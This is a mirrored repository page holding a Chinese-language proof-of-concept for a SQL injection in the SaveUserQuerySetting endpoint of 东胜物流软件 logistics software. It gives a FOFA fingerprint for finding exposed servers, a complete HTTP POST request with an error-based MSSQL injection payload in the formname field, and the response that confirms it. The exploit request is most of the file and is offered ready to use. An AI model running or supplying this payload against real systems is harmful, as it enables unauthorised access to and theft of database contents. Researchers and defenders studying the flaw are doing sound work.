admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/东胜物流软件/东胜物流软件SaveUserQuerySetting存在SQL注入漏洞.md

39 lines
2.2 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 东胜物流软件SaveUserQuerySetting存在SQL注入漏洞
# 一、漏洞简介
东胜物流软件是一款致力于为客户提供IT支撑的 SOP 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。东胜物流软件 SaveUserQuerySetting接口处存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
# 二、影响版本
+ 东胜物流软件
# 三、资产测绘
+ fofa`fid="Z4c2hPCi5IR/AnH5vZXNSQ=="`
+ 特征
![1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04.png](./img/Z-zu1u1tj1z1oq2D/1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04-730451.png)
# 四、漏洞复现
```plain
POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Content-Length: 857
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+sys.fn_VarBinToHexStr(hashbytes('MD5','hello')))+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}
```
![1708936597114-d9d3ffd6-39ff-46a5-8c1a-089a70b86853.png](./img/Z-zu1u1tj1z1oq2D/1708936597114-d9d3ffd6-39ff-46a5-8c1a-089a70b86853-946114.png)
```plain
qxpqq0x5d41402abc4b2a76b9719d911017c592qzkqq
```
![1708946240065-a4df07ad-6ae3-4004-97f5-d08bac4a7286.png](./img/Z-zu1u1tj1z1oq2D/1708946240065-a4df07ad-6ae3-4004-97f5-d08bac4a7286-976094.png)
> 更新: 2024-02-29 23:55:41
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kmeubkhryrzmp90u>
Reference in New Issue Copy Permalink